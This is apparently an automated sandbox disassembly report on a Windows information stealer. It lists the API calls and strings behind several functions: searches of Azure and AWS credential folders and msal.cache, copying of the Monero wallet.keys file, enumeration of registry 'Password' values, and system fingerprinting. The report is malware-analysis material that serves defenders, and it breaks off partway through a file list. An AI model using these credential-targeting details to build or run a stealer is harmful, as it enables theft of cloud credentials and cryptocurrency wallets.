Part of subcall function 00AC4910: lstrcat.KERNEL32(?,?), ref: 00AC4A70
Part of subcall function 00AC4910: lstrcat.KERNEL32(?,00AD0FFC), ref: 00AC4A82
Part of subcall function 00AC4910: lstrcat.KERNEL32(?,?), ref: 00AC4A96
Part of subcall function 00AC4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00AC4AAC
Part of subcall function 00AC4910: DeleteFileA.KERNEL32(?), ref: 00AC4B31

Strings

Azure\.azure, xrefs: 00AC4DD3
msal.cache, xrefs: 00AC4EF0
\.aws\, xrefs: 00AC4E4D
Azure\.IdentityService, xrefs: 00AC4EEB
*.*, xrefs: 00AC4DD8
\.IdentityService\, xrefs: 00AC4ED9
*.*, xrefs: 00AC4E64
\.azure\, xrefs: 00AC4DC1
Azure\.aws, xrefs: 00AC4E5F

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 578ae8676f097de70412f24527174a95a2aca45127753a8fbf3a77e2a7e1800f
Instruction ID: ce30d2e7ebd5c8a6e77bc72296a82cd55d40c248ea2f0b5c1cfa0ee7974e6f0d
Opcode Fuzzy Hash: 578ae8676f097de70412f24527174a95a2aca45127753a8fbf3a77e2a7e1800f
Instruction Fuzzy Hash: F14194B9A4020877C710F770ED57FED7338AB24744F404898B18AA61C2EEB457C8CB92

Function 00AB1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AB12B4
Part of subcall function 00AB12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00AB12BB
Part of subcall function 00AB12A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00AB12D7
Part of subcall function 00AB12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00AB12F5
Part of subcall function 00AB12A0: RegCloseKey.ADVAPI32(?), ref: 00AB12FF

lstrcat.KERNEL32(?,00000000), ref: 00AB134F
lstrlen.KERNEL32(?), ref: 00AB135C
lstrcat.KERNEL32(?,.keys), ref: 00AB1377

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

Part of subcall function 00AC8B60: GetSystemTime.KERNEL32(00AD0E1A,005EE870,00AD05AE,?,?,00AB13F9,?,0000001A,00AD0E1A,00000000,?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00AC8B86

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00AB1465

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

Part of subcall function 00AB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AB99EC
Part of subcall function 00AB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AB9A11
Part of subcall function 00AB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AB9A31
Part of subcall function 00AB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AB148F,00000000), ref: 00AB9A5A
Part of subcall function 00AB99C0: LocalFree.KERNEL32(00AB148F), ref: 00AB9A90
Part of subcall function 00AB99C0: CloseHandle.KERNEL32(000000FF), ref: 00AB9A9A

DeleteFileA.KERNEL32(00000000), ref: 00AB14EF

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00AB1335
.keys, xrefs: 00AB136B
\Monero\wallet.keys, xrefs: 00AB138D
wallet_path, xrefs: 00AB1330

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: e22964877b51b61a2c6399cac044d64322abd894c23efd7bc4c93a48034581cc
Instruction ID: d09c974b7e82486feb02527780adf0c1f9a61956a3882b05c0ca8977d2b8875c
Opcode Fuzzy Hash: e22964877b51b61a2c6399cac044d64322abd894c23efd7bc4c93a48034581cc
Instruction Fuzzy Hash: 115120B1D5011C57CB15FB60DE96FFD733CAB64304F4145ACB60AA2092EE306B89CBA6

Function 00AB75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB72D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00AB733A
Part of subcall function 00AB72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00AB73B1
Part of subcall function 00AB72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00AB740D
Part of subcall function 00AB72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00AB7452
Part of subcall function 00AB72D0: HeapFree.KERNEL32(00000000), ref: 00AB7459

lstrcat.KERNEL32(35235020,00AD17FC), ref: 00AB7606
lstrcat.KERNEL32(35235020,00000000), ref: 00AB7648
lstrcat.KERNEL32(35235020, : ), ref: 00AB765A
lstrcat.KERNEL32(35235020,00000000), ref: 00AB768F
lstrcat.KERNEL32(35235020,00AD1804), ref: 00AB76A0
lstrcat.KERNEL32(35235020,00000000), ref: 00AB76D3
lstrcat.KERNEL32(35235020,00AD1808), ref: 00AB76ED
task.LIBCPMTD ref: 00AB76FB

Strings

: , xrefs: 00AB764E

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: c7561950ff64437cac1b4fbe79e2672d432d87459500029f9e1c77f948d8a5f9
Instruction ID: c3a98d80b7b7aff3dbc1f45b36deb23ed05c37315bd0eb3341f4f92159a4a465
Opcode Fuzzy Hash: c7561950ff64437cac1b4fbe79e2672d432d87459500029f9e1c77f948d8a5f9
Instruction Fuzzy Hash: 65314CB1901109EFCB04EBB8DD95FFFB77CBB44301B144518F106AB2A2DA74A946DB52

Function 00AC7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00AC7542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AC757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AC7603
RtlAllocateHeap.NTDLL(00000000), ref: 00AC760A
wsprintfA.USER32 ref: 00AC7640

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Strings

:, xrefs: 00AC755C
C, xrefs: 00AC754C
\, xrefs: 00AC7560

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: 5eadc40bba6f8dc051a302b69050a22ebdf815b971d3747b14b858e96482460d
Instruction ID: 6b72987bb62e23a10facbca5c6e48b0a59c79989f3699116c0bc7fb35373e50d
Opcode Fuzzy Hash: 5eadc40bba6f8dc051a302b69050a22ebdf815b971d3747b14b858e96482460d
Instruction Fuzzy Hash: 2C417EB1904248ABDB11DB94DD45FEEBBB8BB18704F10019DF509A7280DB78AA44CFA6

Function 00AC8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,005EF5E8,00000000,?,00AD0E2C,00000000,?,00000000), ref: 00AC8130
RtlAllocateHeap.NTDLL(00000000), ref: 00AC8137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00AC8158
__aulldiv.LIBCMT ref: 00AC8172
__aulldiv.LIBCMT ref: 00AC8180
wsprintfA.USER32 ref: 00AC81AC

Strings

@, xrefs: 00AC814D
%d MB, xrefs: 00AC81A3

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2774356765-3474575989
Opcode ID: 6098c2b631b0d4f88a83feb1de1e56d345f3eefb6818ef7e921fff9a24aba223
Instruction ID: a1e5ee42b955f7c0c51335af306d3220f8c195df2f73f327dbd0642f1444d3f7
Opcode Fuzzy Hash: 6098c2b631b0d4f88a83feb1de1e56d345f3eefb6818ef7e921fff9a24aba223
Instruction Fuzzy Hash: C0211AB1E44218ABDB00DFD5CD49FAEB7B8FB44B54F104619F605BB280D7B869018BA6

Function 00AB72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00AB733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00AB73B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00AB740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00AB7452
HeapFree.KERNEL32(00000000), ref: 00AB7459
task.LIBCPMTD ref: 00AB7555

Strings

Password, xrefs: 00AB7401

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 8ccfe7a2eeca71e182751d701d9246c356862eb98910eb2b546f8a82c119f079
Instruction ID: 6a9ff2c746ba5563c61b15fb1a4f20832191d577f6d88adb98bd804159e4e4b0
Opcode Fuzzy Hash: 8ccfe7a2eeca71e182751d701d9246c356862eb98910eb2b546f8a82c119f079
Instruction Fuzzy Hash: 3C611CB59041689BDB24DB54DD41FDEB7BCBF44340F0081E9E649A6142DBB06BC9CFA1

Function 00AC40B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,005EE368,00000000,00020119,?), ref: 00AC40F4
RegQueryValueExA.ADVAPI32(?,005EF780,00000000,00000000,00000000,000000FF), ref: 00AC4118
RegCloseKey.ADVAPI32(?), ref: 00AC4122
lstrcat.KERNEL32(?,00000000), ref: 00AC4147
lstrcat.KERNEL32(?,005EF798), ref: 00AC415B

Strings

(^, xrefs: 00AC4209
h^, xrefs: 00AC40E8

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
